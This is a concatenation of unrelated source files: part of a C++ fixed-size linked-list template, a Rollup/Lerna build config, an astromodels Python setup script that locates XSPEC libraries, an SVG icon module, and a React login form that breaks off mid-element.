data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1);
++construct_count;
insert_node(terminal_node, *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the back of the list..
//*************************************************************************
template <typename T1, typename T2>
void emplace_back(const T1& value1, const T2& value2)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2);
++construct_count;
insert_node(terminal_node, *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the back of the list..
//*************************************************************************
template <typename T1, typename T2, typename T3>
void emplace_back(const T1& value1, const T2& value2, const T3& value3)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3);
++construct_count;
insert_node(terminal_node, *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the back of the list..
//*************************************************************************
template <typename T1, typename T2, typename T3, typename T4>
void emplace_back(const T1& value1, const T2& value2, const T3& value3, const T4& value4)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3, value4);
++construct_count;
insert_node(terminal_node, *p_data_node);
}
//*************************************************************************
/// Removes a value from the back of the list.
//*************************************************************************
void pop_back()
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!empty(), ETL_ERROR(list_empty));
#endif
node_t& node = get_tail();
remove_node(node);
}
//*************************************************************************
/// Inserts a value to the list at the specified position.
//*************************************************************************
iterator insert(iterator position, const value_type& value)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t& data_node = allocate_data_node(value);
insert_node(*position.p_node, data_node);
return iterator(data_node);
}
//*************************************************************************
/// Emplaces a value to the list at the specified position.
//*************************************************************************
template <typename T1>
iterator emplace(iterator position, const T1& value1)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1);
++construct_count;
insert_node(*position.p_node, *p_data_node);
return iterator(*p_data_node);
}
//*************************************************************************
/// Emplaces a value to the list at the specified position.
//*************************************************************************
template <typename T1, typename T2>
iterator emplace(iterator position, const T1& value1, const T2& value2)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2);
++construct_count;
insert_node(*position.p_node, *p_data_node);
return iterator(*p_data_node);
}
//*************************************************************************
/// Emplaces a value to the list at the specified position.
//*************************************************************************
template <typename T1, typename T2, typename T3>
iterator emplace(iterator position, const T1& value1, const T2& value2, const T3& value3)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3);
++construct_count;
insert_node(*position.p_node, *p_data_node);
return iterator(*p_data_node);
}
//*************************************************************************
/// Emplaces a value to the list at the specified position.
//*************************************************************************
template <typename T1, typename T2, typename T3, typename T4>
iterator emplace(iterator position, const T1& value1, const T2& value2, const T3& value3, const T4& value4)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3, value4);
++construct_count;
insert_node(*position.p_node, *p_data_node);
return iterator(*p_data_node);
}
//*************************************************************************
/// Inserts 'n' copies of a value to the list at the specified position.
//*************************************************************************
void insert(iterator position, size_t n, const value_type& value)
{
for (size_t i = 0; i < n; ++i)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
// Set up the next free node and insert.
insert_node(*position.p_node, allocate_data_node(value));
}
}
//*************************************************************************
/// Inserts a range of values to the list at the specified position.
//*************************************************************************
template <typename TIterator>
void insert(iterator position, TIterator first, TIterator last)
{
while (first != last)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
// Set up the next free node and insert.
insert_node(*position.p_node, allocate_data_node(*first++));
}
}
//*************************************************************************
/// Erases the value at the specified position.
//*************************************************************************
iterator erase(iterator position)
{
++position;
remove_node(*position.p_node->previous);
return position;
}
//*************************************************************************
/// Erases a range of elements.
//*************************************************************************
iterator erase(iterator first, iterator last)
{
node_t* p_first = first.p_node;
node_t* p_last = last.p_node;
node_t* p_next;
// Join the ends.
join(*(p_first->previous), *p_last);
// Erase the ones in between.
while (p_first != p_last)
{
p_next = p_first->next; // Remember the next node.
destroy_data_node(static_cast<data_node_t&>(*p_first)); // Destroy the current node.
p_first = p_next; // Move to the next node.
}
return last;
}
//*************************************************************************
/// Resizes the list.
//*************************************************************************
void resize(size_t n)
{
resize(n, T());
}
//*************************************************************************
/// Resizes the list.
//*************************************************************************
void resize(size_t n, parameter_t value)
{
ETL_ASSERT(n <= MAX_SIZE, ETL_ERROR(list_full));
// Smaller?
if (n < size())
{
iterator i_start = end();
std::advance(i_start, -difference_type(size() - n));
erase(i_start, end());
}
// Larger?
else if (n > size())
{
insert(end(), n - size(), value);
}
}
//*************************************************************************
/// Clears the list.
//*************************************************************************
void clear()
{
initialise();
}
//*************************************************************************
// Removes the values specified.
//*************************************************************************
void remove(const value_type& value)
{
iterator iValue = begin();
while (iValue != end())
{
if (value == *iValue)
{
iValue = erase(iValue);
}
else
{
++iValue;
}
}
}
//*************************************************************************
/// Removes according to a predicate.
//*************************************************************************
template <typename TPredicate>
void remove_if(TPredicate predicate)
{
iterator iValue = begin();
while (iValue != end())
{
if (predicate(*iValue))
{
iValue = erase(iValue);
}
else
{
++iValue;
}
}
}
//*************************************************************************
/// Removes all but the first element from every consecutive group of equal
/// elements in the container.
//*************************************************************************
void unique()
{
unique(std::equal_to<T>());
}
//*************************************************************************
/// Removes all but the first element from every consecutive group of equal
/// elements in the container.
//*************************************************************************
template <typename TIsEqual>
void unique(TIsEqual isEqual)
{
if (empty())
{
return;
}
iterator i_item = begin();
++i_item;
iterator i_previous = begin();
while (i_item != end())
{
if (isEqual(*i_previous, *i_item))
{
i_item = erase(i_item);
}
else
{
i_previous = i_item;
++i_item;
}
}
}
//*************************************************************************
/// Splices from another list to this.
//*************************************************************************
void splice(iterator to, ilist& other)
{
if (&other != this)
{
insert(to, other.begin(), other.end());
other.erase(other.begin(), other.end());
}
}
//*************************************************************************
/// Splices an element from another list to this.
//*************************************************************************
void splice(iterator to, ilist& other, iterator from)
{
if (&other == this)
{
// Internal move.
move(to, from);
}
else
{
// From another list.
insert(to, *from);
other.erase(from);
}
}
//*************************************************************************
/// Splices a range of elements from another list to this.
//*************************************************************************
void splice(iterator to, ilist& other, iterator first, iterator last)
{
if (&other == this)
{
// Internal move.
move(to, first, last);
}
else
{
// From another list.
insert(to, first, last);
other.erase(first, last);
}
}
//*************************************************************************
/// Merge another list into this one. Both lists should be sorted.
//*************************************************************************
void merge(ilist& other)
{
merge(other, std::less<value_type>());
}
//*************************************************************************
/// Merge another list into this one. Both lists should be sorted.
//*************************************************************************
template <typename TCompare>
void merge(ilist& other, TCompare compare)
{
if (!other.empty())
{
#if defined(ETL_DEBUG)
ETL_ASSERT(etl::is_sorted(other.begin(), other.end(), compare), ETL_ERROR(list_unsorted));
ETL_ASSERT(etl::is_sorted(begin(), end(), compare), ETL_ERROR(list_unsorted));
#endif
ilist::iterator other_begin = other.begin();
ilist::iterator other_end = other.end();
ilist::iterator this_begin = begin();
ilist::iterator this_end = end();
while ((this_begin != this_end) && (other_begin != other_end))
{
// Find the place to insert.
while ((this_begin != this_end) && !(compare(*other_begin, *this_begin)))
{
++this_begin;
}
// Insert.
if (this_begin != this_end)
{
while ((other_begin != other_end) && (compare(*other_begin, *this_begin)))
{
insert(this_begin, *other_begin);
++other_begin;
}
}
}
// Any left over?
if ((this_begin == this_end) && (other_begin != other_end))
{
insert(this_end, other_begin, other_end);
}
other.clear();
}
}
//*************************************************************************
/// Sort using in-place merge sort algorithm.
/// Uses 'less-than operator as the predicate.
//*************************************************************************
void sort()
{
sort(std::less<T>());
}
//*************************************************************************
/// Sort using in-place merge sort algorithm.
/// Uses a supplied predicate function or functor.
/// This is not my algorithm. I got it off the web somewhere.
//*************************************************************************
template <typename TCompare>
void sort(TCompare compare)
{
iterator i_left;
iterator i_right;
iterator i_node;
iterator i_head;
iterator i_tail;
int list_size = 1;
int number_of_merges;
int left_size;
int right_size;
if (is_trivial_list())
{
return;
}
while (true)
{
i_left = begin();
i_head = end();
i_tail = end();
number_of_merges = 0; // Count the number of merges we do in this pass.
while (i_left != end())
{
++number_of_merges; // There exists a merge to be done.
i_right = i_left;
left_size = 0;
// Step 'list_size' places along from left
for (int i = 0; i < list_size; ++i)
{
++left_size;
++i_right;
if (i_right == end())
{
break;
}
}
// If right hasn't fallen off end, we have two lists to merge.
right_size = list_size;
// Now we have two lists. Merge them.
while (left_size > 0 || (right_size > 0 && i_right != end()))
{
// Decide whether the next node of merge comes from left or right.
if (left_size == 0)
{
// Left is empty. The node must come from right.
i_node = i_right++;
--right_size;
}
else if (right_size == 0 || i_right == end())
{
// Right is empty. The node must come from left.
i_node = i_left++;
--left_size;
}
else if (!compare(*i_right, *i_left))
{
// First node of left is lower or same. The node must come from left.
i_node = i_left++;
--left_size;
}
else
{
// First node of right is lower. The node must come from right.
i_node = i_right;
++i_right;
--right_size;
}
// Add the next node to the merged head.
if (i_head == end())
{
join(*i_head.p_node, *i_node.p_node);
i_head = i_node;
i_tail = i_node;
}
else
{
join(*i_tail.p_node, *i_node.p_node);
i_tail = i_node;
}
join(*i_tail.p_node, terminal_node);
}
// Now left has stepped `list_size' places along, and right has too.
i_left = i_right;
}
// If we have done only one merge, we're finished.
if (number_of_merges <= 1) // Allow for number_of_merges == 0, the empty head case
{
return;
}
// Otherwise repeat, merging lists twice the size
list_size *= 2;
}
}
//*************************************************************************
/// Assignment operator.
//*************************************************************************
ilist& operator = (const ilist& rhs)
{
if (&rhs != this)
{
assign(rhs.cbegin(), rhs.cend());
}
return *this;
}
protected:
//*************************************************************************
/// Constructor.
//*************************************************************************
ilist(etl::ipool& node_pool, size_t max_size_)
: list_base(node_pool, max_size_)
{
}
//*************************************************************************
/// Initialise the list.
//*************************************************************************
void initialise()
{
if (!empty())
{
if ETL_IF_CONSTEXPR(etl::is_trivially_destructible<T>::value)
{
p_node_pool->release_all();
construct_count.clear();
}
else
{
node_t* p_first = terminal_node.next;
node_t* p_last = &terminal_node;
while (p_first != p_last)
{
destroy_data_node(static_cast<data_node_t&>(*p_first)); // Destroy the current node.
p_first = p_first->next; // Move to the next node.
}
}
}
join(terminal_node, terminal_node);
}
private:
//*************************************************************************
/// Moves an element from one position to another within the list.
/// Moves the element at position 'from' to the position before 'to'.
//*************************************************************************
void move(iterator to, iterator from)
{
if (from == to)
{
return; // Can't more to before yourself!
}
node_t& from_node = *from.p_node;
node_t& to_node = *to.p_node;
// Disconnect the node from the list.
join(*from_node.previous, *from_node.next);
// Attach it to the new position.
join(*to_node.previous, from_node);
join(from_node, to_node);
}
//*************************************************************************
/// Moves a range from one position to another within the list.
/// Moves a range at position 'first'/'last' to the position before 'to'.
//*************************************************************************
void move(iterator to, iterator first, iterator last)
{
if ((first == to) || (last == to))
{
return; // Can't more to before yourself!
}
#if defined(ETL_DEBUG)
// Check that we are not doing an illegal move!
for (const_iterator item = first; item != last; ++item)
{
ETL_ASSERT(item != to, ETL_ERROR(list_iterator));
}
#endif
node_t& first_node = *first.p_node;
node_t& last_node = *last.p_node;
node_t& to_node = *to.p_node;
node_t& final_node = *last_node.previous;
// Disconnect the range from the list.
join(*first_node.previous, last_node);
// Attach it to the new position.
join(*to_node.previous, first_node);
join(final_node, to_node);
}
//*************************************************************************
/// Remove a node.
//*************************************************************************
void remove_node(node_t& node)
{
// Disconnect the node from the list.
join(*node.previous, *node.next);
// Destroy the pool object.
destroy_data_node(static_cast<data_node_t&>(node));
}
//*************************************************************************
/// Allocate a data_node_t.
//*************************************************************************
data_node_t& allocate_data_node(parameter_t value)
{
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value);
++construct_count;
return *p_data_node;
}
//*************************************************************************
/// Destroy a data_node_t.
//*************************************************************************
void destroy_data_node(data_node_t& node)
{
node.value.~T();
p_node_pool->release(&node);
--construct_count;
}
// Disable copy construction.
ilist(const ilist&);
#if defined(ETL_POLYMORPHIC_LIST) || defined(ETL_POLYMORPHIC_CONTAINERS)
public:
virtual ~ilist()
{
}
#else
protected:
~ilist()
{
}
#endif
};
//*************************************************************************
/// A templated list implementation that uses a fixed size buffer.
///\note 'merge' and 'splice' and are not supported.
//*************************************************************************
template <typename T, const size_t MAX_SIZE_>
class list : public etl::ilist<T>
{
public:
static const size_t MAX_SIZE = MAX_SIZE_;
public:
typedef T value_type;
typedef T* pointer;
typedef const T* const_pointer;
typedef T& reference;
typedef const T& const_reference;
typedef size_t size_type;
//*************************************************************************
/// Default constructor.
//*************************************************************************
list()
: etl::ilist<T>(node_pool, MAX_SIZE)
{
etl::ilist<T>::initialise();
}
//*************************************************************************
/// Destructor.
//*************************************************************************
~list()
{
etl::ilist<T>::initialise();
}
//*************************************************************************
/// Construct from size.
//*************************************************************************
explicit list(size_t initial_size)
: etl::ilist<T>(node_pool, MAX_SIZE)
{
etl::ilist<T>::assign(initial_size, T());
}
//*************************************************************************
/// Construct from size and value.
//*************************************************************************
list(size_t initial_size, typename ilist<T>::parameter_t value)
: etl::ilist<T>(node_pool, MAX_SIZE)
{
etl::ilist<T>::assign(initial_size, value);
}
//*************************************************************************
/// Copy constructor.
//*************************************************************************
list(const list& other)
: etl::ilist<T>(node_pool, MAX_SIZE)
{
if (this != &other)
{
etl::ilist<T>::assign(other.cbegin(), other.cend());
}
}
//*************************************************************************
/// Construct from range.
//*************************************************************************
template <typename TIterator>
list(TIterator first, TIterator last)
: ilist<T>(node_pool, MAX_SIZE)
{
etl::ilist<T>::assign(first, last);
}
//*************************************************************************
/// Assignment operator.
//*************************************************************************
list& operator = (const list& rhs)
{
if (&rhs != this)
{
etl::ilist<T>::assign(rhs.cbegin(), rhs.cend());
}
return *this;
}
private:
/// The pool of nodes used in the list.
etl::pool<typename etl::ilist<T>::data_node_t, MAX_SIZE> node_pool;
};
}
//*************************************************************************
/// Equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the arrays are equal, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator ==(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return (lhs.size() == rhs.size()) && std::equal(lhs.begin(), lhs.end(), rhs.begin());
}
//*************************************************************************
/// Not equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the arrays are not equal, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator !=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return !(lhs == rhs);
}
//*************************************************************************
/// Less than operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically less than the
/// second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator <(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return std::lexicographical_compare(lhs.begin(),
lhs.end(),
rhs.begin(),
rhs.end());
}
//*************************************************************************
/// Greater than operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically greater than the
/// second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator >(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return (rhs < lhs);
}
//*************************************************************************
/// Less than or equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically less than or equal
/// to the second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator <=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return !(lhs > rhs);
}
//*************************************************************************
/// Greater than or equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically greater than or
/// equal to the second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator >=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
return !(lhs < rhs);
}
#ifdef ETL_COMPILER_MICROSOFT
#define min(a,b) (((a) < (b)) ? (a) : (b))
#endif
#undef ETL_FILE
#endif
|
/** TODO: bundler tricks
* 🔇 shim the console.log on both `bytebeallcore` and `headless-wallet`
*/
import {dirname, resolve, parse} from "path"
import {sync as glob} from "globby"
import {logger} from "@rollup/log"
import {rm, mv} from "shelljs"
import {sync as rmEmptyDir} from "delete-empty"
import nodeResolve from "rollup-plugin-node-resolve"
import json from "rollup-plugin-json"
import typescript from "rollup-plugin-typescript2"
import babel from "rollup-plugin-babel"
const log = logger({timestamp: true})
const {LERNA_PACKAGE_NAME, LERNA_ROOT_PATH, ROLLUP_WATCH} = process.env
let numOutput, count = 0
const lernaInfo = {
name: "lerna-info",
buildStart: input => {
rm("-rf", "dist", ".rpt2_cache", "types")
log.info(`start building ${LERNA_PACKAGE_NAME} 🚧`)
},
generateBundle: output => log.pass(`finish building ${LERNA_PACKAGE_NAME} as ${output.format.toUpperCase()} module 🏁`),
writeBundle: result => {
if (numOutput <= ++count) {
if (!ROLLUP_WATCH) mv("types/*/src/*", "types")
rmEmptyDir("types")
}
},
renderError: error => log.fail(error.message + ' ❌')
}
const splice = (items, name, ...item) => ({
at: (idx, del=0) => {
items.splice(items.indexOf(name) + idx, del, ...item)
return {chain: obj => obj}
}
})
// #region helper
export const pkg = require(resolve(process.cwd(), "package.json"))
export const pkgRoot = require(resolve(LERNA_ROOT_PATH, "package.json"))
export function mapInput(inputs) {
const result = {}
for (const key in inputs) {
if (!key.includes("*")) Object.assign(result, {[key]: inputs[key]})
else { // support glob pattern
const [prefix, suffix] = key.split("*")
const input = glob(resolve(process.cwd(), inputs[key])).reduce(
(obj, item) => (obj[`${prefix}/${parse(item).name}${suffix}`] = item, obj), {}
)
Object.assign(result, input)
}
}
return result
}
export function mapOutput(outputs) {
numOutput = outputs.length
return outputs.map(output => {
const ext = output.format === "es" ? "mjs" : "js"
const dist = output.format === "es" ? pkg.module : pkg.main
const subdir = outputs.length > 1 ? output.format : ''
return {
dir: resolve(dirname(dist), subdir),
// TODO: try https://github.com/rollup/rollup/issues/2336 when merged
chunkFileNames: `chunks/[name]-[hash].${ext}`,
entryFileNames: `[name].${ext}`,
...output
}
})
}
export const modify = plugins => ({
plug: (...plugin) => ({
before: name => splice(plugins, name, ...plugin).at(0).chain(modify(plugins)),
after: name => splice(plugins, name, ...plugin).at(1).chain(modify(plugins)),
replacing: name => splice(plugins, name, ...plugin).at(0, 1).chain(modify(plugins)),
})
})
// #endregion helper
// Rollup Configuration
export default {
watch: {clearScreen: false},
plugins: [
lernaInfo,
json(),
ROLLUP_WATCH && babel({
root: LERNA_ROOT_PATH,
cwd: process.cwd(),
extensions: [".ts"]
}),
nodeResolve({extensions: [".ts"]}),
!ROLLUP_WATCH && typescript({
exclude: ["test/**"],
tsconfig: resolve(LERNA_ROOT_PATH, "tsconfig.json"),
// cacheRoot: `${require("temp-dir")}/.rpt2_cache`, // enable this if it's difficult to read the packages structure
tsconfigOverride: {
compilerOptions: {
module: "esnext",
declaration: true,
declarationDir: `${process.cwd()}/types`
}
},
useTsconfigDeclarationDir: true
}),
],
}
|
#!/usr/bin/env python
from __future__ import print_function
import ctypes.util
import glob
import os
import re
import sys
from distutils.version import LooseVersion
from setuptools import Extension, setup
from setuptools.command.build_ext import build_ext as _build_ext
import versioneer
# This is needed to use numpy in this module, and should work whether or not numpy is
# already installed. If it's not, it will trigger an installation
_default_xspec_version = "12.10.1"
class My_build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
# Prevent numpy from thinking it is still in its setup process:
__builtins__.__NUMPY_SETUP__ = False
import numpy
self.include_dirs.append(numpy.get_include())
self.include_dirs.append('astromodels/xspec/include')
def sanitize_lib_name(library_path):
"""
Get a fully-qualified library name, like /usr/lib/libgfortran.so.3.0, and returns the lib name needed to be
passed to the linker in the -l option (for example gfortran)
:param library_path:
:return:
"""
lib_name = os.path.basename(library_path)
# Some regexp magic needed to extract in a system-independent (mac/linux) way the library name
tokens = re.findall("lib(.+)(\.so|\.dylib|\.a)(.+)?", lib_name)
if not tokens:
raise RuntimeError('Attempting to find %s in directory %s but there are no libraries in this directory'%(lib_name,library_path))
return tokens[0][0]
def find_library(library_root, additional_places=None):
"""
Returns the name of the library without extension
:param library_root: root of the library to search, for example "cfitsio_" will match libcfitsio_1.2.3.4.so
:return: the name of the library found (NOTE: this is *not* the path), and a directory path if the library is not
in the system paths (and None otherwise). The name of libcfitsio_1.2.3.4.so will be cfitsio_1.2.3.4, in other words,
it will be what is needed to be passed to the linker during a c/c++ compilation, in the -l option
"""
# find_library searches for all system paths in a system independent way (but NOT those defined in
# LD_LIBRARY_PATH or DYLD_LIBRARY_PATH)
first_guess = ctypes.util.find_library(library_root)
if first_guess is not None:
# Found in one of the system paths
if sys.platform.lower().find("linux") >= 0:
# On linux the linker already knows about these paths, so we
# can return None as path
return sanitize_lib_name(first_guess), None
elif sys.platform.lower().find("darwin") >= 0:
# On Mac we still need to return the path, because the linker sometimes
# does not look into it
return sanitize_lib_name(first_guess), os.path.dirname(first_guess)
else:
# Windows is not supported
raise NotImplementedError("Platform %s is not supported" % sys.platform)
else:
# could not find it. Let's examine LD_LIBRARY_PATH or DYLD_LIBRARY_PATH
# (if they sanitize_lib_name(first_guess), are not defined, possible_locations will become [""] which will
# be handled by the next loop)
if sys.platform.lower().find("linux") >= 0:
# Unix / linux
possible_locations = os.environ.get("LD_LIBRARY_PATH", "").split(":")
elif sys.platform.lower().find("darwin") >= 0:
# Mac
possible_locations = os.environ.get("DYLD_LIBRARY_PATH", "").split(":")
else:
raise NotImplementedError("Platform %s is not supported" % sys.platform)
if additional_places is not None:
possible_locations.extend(additional_places)
# Now look into the search paths
library_name = None
library_dir = None
for search_path in possible_locations:
if search_path == "":
# This can happen if there are more than one :, or if nor LD_LIBRARY_PATH
# nor DYLD_LIBRARY_PATH are defined (because of the default use above for os.environ.get)
continue
results = glob.glob(os.path.join(search_path, "lib%s*" % library_root))
if len(results) >= 1:
# Results contain things like libXS.so, libXSPlot.so, libXSpippo.so
# If we are looking for libXS.so, we need to make sure that we get the right one!
for result in results:
if re.match("lib%s[\-_\.]" % library_root, os.path.basename(result)) is None:
continue
else:
# FOUND IT
# This is the full path of the library, like /usr/lib/libcfitsio_1.2.3.4
library_name = result
library_dir = search_path
break
else:
continue
if library_name is not None:
break
if library_name is None:
return None, None
else:
# Sanitize the library name to get from the fully-qualified path to just the library name
# (/usr/lib/libgfortran.so.3.0 becomes gfortran)
return sanitize_lib_name(library_name), library_dir
def setup_xspec():
headas_root = os.environ.get("HEADAS")
conda_prefix = os.environ.get("CONDA_PREFIX")
xspec_version = os.environ.get("ASTRO_XSPEC_VERSION")
# thanks to the sherpa team for this
if xspec_version is None:
print("WARN: You have not specified and XSPEC version with the ")
print("WARN: environment variable ASTRO_XSPEC_VERSION")
print(f"WARN: we will assume you have {_default_xspec_version}")
xspec_raw_version = _default_xspec_version
else:
print(f"WARN: you have specified you have XSPEC version {xspec_version}")
xspec_raw_version = xspec_version
xspec_version = LooseVersion(xspec_raw_version)
macros = []
if xspec_version < LooseVersion("12.9.0"):
print("WARN: XSPEC Version is less than 12.9.0, which is the minimal supported version for astromodels")
# I am not sure what the naming of the XSPEC components are,
# but let's stick with major, minor, and patch.
#
for major, minor, patch in [(12, 9, 0), (12, 9, 1),
(12, 10, 0), (12, 10, 1),
(12, 11, 0), (12, 11, 1),
(12, 12, 0), (12, 12, 1)]:
version = '{}.{}.{}'.format(major, minor, patch)
macro = 'XSPEC_{}_{}_{}'.format(major, minor, patch)
if xspec_version >= LooseVersion(version):
macros += [(macro, None)]
print(macros)
if headas_root is None:
# See, maybe we are running in Conda
if conda_prefix is None:
# Maybe this is a Conda build
conda_prefix = os.environ.get("PREFIX")
if conda_prefix is not None:
# Yes, this is Conda
# Let's see if the package xspec-modelsonly has been installed by checking whether one of the Xspec
# libraries exists within conda
conda_lib_path = os.path.join(conda_prefix, 'lib')
this_lib, this_lib_path = find_library('XSFunctions', additional_places=[conda_lib_path])
if this_lib is None:
# No, there is no library in Conda
print("No xspec-modelsonly package has been installed in Conda. Xspec support will not be installed")
print("Was looking into %s" % conda_lib_path)
return None
else:
print("The xspec-modelsonly package has been installed in Conda. Xspec support will be installed")
# Set up the HEADAS variable so that the following will find the libraries
headas_root = conda_prefix
else:
print("No HEADAS env. variable set. Xspec support will not be installed ")
return None
else:
print("\n Xspec is detected. Will compile the Xspec extension.\n")
print("\n NOTICE!!!!!\n")
print("If you have issues, manually set the ENV variable XSPEC_INC_PATH")
print("To the location of the XSPEC headers\n\n")
print("If you are still having issues, unset HEADAS before installing and contact the support team")
# Make sure these libraries exist and are linkable right now
# (they need to be in LD_LIBRARY_PATH or DYLD_LIBRARY_PATH or in one of the system paths)
libraries_root = ['XSFunctions', 'XSModel', 'XSUtil', 'XS', 'cfitsio', 'CCfits', 'wcs', 'gfortran']
libraries = []
library_dirs = []
for lib_root in libraries_root:
this_library, this_library_path = find_library(lib_root, additional_places=[os.path.join(headas_root, 'lib')])
if this_library is None:
raise IOError("Could not find library %s. Impossible to compile Xspec" % lib_root)
else:
print("Found library %s in %s" % (this_library, this_library_path))
libraries.append(this_library)
if this_library_path is not None:
# This library is not in one of the system path library, we need to add
# it to the -L flag during linking. Let's put it in the library_dirs list
# which will be used in the Extension class
library_dirs.append(this_library_path)
# try to manually add on the include directory
header_paths = []
if library_dirs:
# grab it from the lib assuming that it is one up
xspec_path, _ = os.path.split(library_dirs[0])
include_path = os.path.join(xspec_path, "include")
header_paths.append(include_path)
# let's be sure to add the conda include directory
if conda_prefix is not None:
conda_include_path = os.path.join(conda_prefix, 'include')
header_paths.append(conda_include_path)
# check if there are user set the location of the xspec headers:
xspec_headers_path = os.environ.get("XSPEC_INC_PATH")
if xspec_headers_path is not None:
print("You have set XSPEC_INC_PATH=%s" % xspec_headers_path)
header_paths.append(xspec_headers_path)
# Remove duplicates from library_dirs and header_paths
library_dirs = list(set(library_dirs))
header_paths = list(set(header_paths))
# Configure the variables to build the external module with the C/C++ wrapper
ext_modules_configuration = [
Extension("astromodels.xspec._xspec",
["astromodels/xspec/src/_xspec.cc", ],
include_dirs=header_paths,
libraries=libraries,
library_dirs=library_dirs,
runtime_library_dirs=library_dirs,
extra_compile_args=[], define_macros=macros),
]
return ext_modules_configuration
# Normal packages
packages = ['astromodels',
'astromodels/core',
'astromodels/functions',
'astromodels/functions/functions_1D',
'astromodels/functions/dark_matter',
'astromodels/sources',
'astromodels/utils',
'astromodels/xspec',
'astromodels/tests'
]
# Check whether we can compile Xspec support
ext_modules_configuration = setup_xspec()
# Add the node_ctype module
setup(
setup_requires=['numpy'],
#cmdclass={'build_ext': My_build_ext},
cmdclass=versioneer.get_cmdclass({'build_ext': My_build_ext}),
packages=packages,
data_files=[('astromodels/data/functions', glob.glob('astromodels/data/functions/*.yaml')),
('astromodels/data/tests', glob.glob('astromodels/data/tests/*.fits'))
],
# The __version__ comes from the exec at the top
version=versioneer.get_version(),
download_url='https://github.com/threeml/astromodels/archive/v0.1',
keywords=['Likelihood', 'Models', 'fit'],
ext_modules=ext_modules_configuration,
package_data={
'astromodels': ['data/dark_matter/*', 'data/xsect/*', 'data/past_1D_values.h5'],
},
)
|
var m = require('mithril');
module.exports = m.trust('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="full" width="24" height="24" viewBox="0 0 24.00 24.00" enable-background="new 0 0 24.00 24.00" xml:space="preserve"><path fill="#000000" fill-opacity="1" stroke-width="1.33333" stroke-linejoin="miter" d="M 21,19L 21,20L 3,20L 3,19L 5,17L 5,11C 4.99921,7.9037 7.03273,5.1747 10,4.29C 9.99508,4.1934 9.99508,4.0966 10,4C 10,2.8954 10.8954,2 12,2C 13.1046,2 14,2.8954 14,4C 14.0049,4.0966 14.0049,4.1934 14,4.29C 16.9673,5.1747 19.0008,7.9037 19,11L 19,17L 21,19 Z M 14,21C 14,22.1046 13.1046,23 12,23C 10.8954,23 10,22.1046 10,21M 19.75,3.19L 18.33,4.61C 20.0367,6.2986 20.9979,8.5991 21,11L 23,11C 23.0077,8.0662 21.8367,5.2522 19.75,3.19 Z M 1,11L 3,11C 3.00207,8.5991 3.96332,6.2986 5.67,4.61L 4.25,3.19C 2.16328,5.2522 0.992297,8.0662 1,11 Z "/></svg>');
|
import {
Button,
Container,
Form,
Icon,
Message,
Segment,
} from 'semantic-ui-react';
import PropTypes from 'prop-types';
import Link from 'next/link';
const LoginForm = ({
user,
loading,
disabled,
error,
signupLink,
handleChange,
handleSubmit,
}) => (
<Container text>
<Message
attached
icon="privacy"
header="Welcome Back!"
content="Log in with email and password"
color="black"
/>
<Form loading={loading} error={Boolean(error)} onSubmit={handleSubmit}>
<Message error header="Oops!" content={error} />
<Segment>
<Form.Input
fluid
icon="envelope"
iconPosition="left"
label="Email"
placeholder="Email"
name="email"
type="email"
value={user.email}
onChange={handleChange}
/>
<Form.Input
fluid
icon="lock"
iconPosition="left"
label="Password"
placeholder="Password"
name="password"
type="password"
value={user.password}
onChange={handleChange}
/>
<Button
disabled={disabled || loading}
